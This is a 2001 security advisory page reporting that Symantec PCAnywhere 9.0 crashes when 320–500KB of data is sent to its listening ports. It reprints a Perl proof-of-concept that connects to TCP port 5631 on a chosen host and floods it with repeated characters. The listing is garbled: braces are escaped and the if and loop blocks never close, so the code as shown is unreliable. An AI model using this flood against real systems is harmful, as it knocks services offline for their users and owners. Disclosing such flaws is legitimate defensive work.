Skip navigation

PCAnywhere 9.0 Vulnerable to DoS Attack

Reported February 11, 2001 by Securax.

  • PC Anywhere 9.0


A Denial of Service (DoS) vulnerability has been discovered in Symantec PC Anywhere 9.0. By sending anywhere between 320KB to 500KB of data to one of the two listening ports (5631 and 65301), a malicious user can cause PCAnywhere to crash. Currently, the vulnerability is a simple DoS risk, but the attack might be developed into an exploitable overflow.


The following proof of concept code was supplied by Securax.



   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   # by incubus <[email protected]>
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   # Zym0tic, segfault, #[email protected]
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV\[0\]";
   $port = 5631;
   if ($#ARGV<0) \{
   print "use it like: $0 <hostname>\n";
   $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
   print "hello\n";
   $buf = "";
   for($counter = 0; $counter < 500000; $counter++) \{
           $buf .= "\x61";
   print $socket "$buf\n";



Unfortunately, Securax released its advisory to the public in conjunction with contacting the vendor, so no vendor response is available at this time. A copy of the Securax advisory is available at:

Discovered by

Hide comments


  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.